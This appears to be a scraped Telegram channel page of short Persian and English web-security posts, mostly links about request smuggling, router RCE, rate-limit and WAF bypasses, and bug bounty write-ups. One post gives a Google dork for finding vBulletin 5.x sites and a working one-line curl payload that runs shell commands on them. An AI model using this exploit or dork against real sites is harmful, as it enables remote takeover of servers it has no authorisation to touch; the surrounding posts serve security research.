Web_Priv8
762 subscribers
405 photos
24 videos
45 files
588 links
Sina Doosti @r00t98
Web Security Researcher, Bug Hunter
https://twitter.com/r00t98

Amir Hasanvand @al9n3_wolf
Web Security Researcher, Bug Hunter
https://twitter.com/al9n3_wolf
Download Telegram
HTTP Request Smuggling in 2020

#Smuggling
#Book

@web_priv8
آسیب پذیری RCE بر روی روترهای مبین نت

بخش انگلیسی:
https://link.medium.com/2QQKzATVM8

بخش فارسی:
https://vrgl.ir/3gZtC


#RCE

@web_priv8
0day RCE exploit on vBulletin 5xx

dork ; intext:"Powered by vBulletin"
POC
curl -s https://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'

#vbulletin
#rce
#pentest
#web

@sec_nerd
راهکارهایی برای دور زدن Rate Limit



#bugbounty
#pentest


@sec_nerd
لیست جامعی از رایت آپ های کشف باگ در وبسایتهای بزرگ

از سال ۲۰۱۲ تا ۲۰۲۰


https://pentester.land/list-of-bug-bounty-writeups.html


#pentest
#bugbounty


@sec_nerd
به تعداد راه‌های رسیدن به خدا، راه دور زدن مکانیزم‌های امنیتی هم هست.

توی این گزارش، محقق با خوندن مستندات Content-type (یکی از سرآیندهای پروتکل HTTP) تونسته راه‌هایی رو پیدا کنه که می‌شه ازش در دور زدن مکانیزم‌های امنیتی تحت مرورگر و WAFها بهره گرفت.
@offsecmag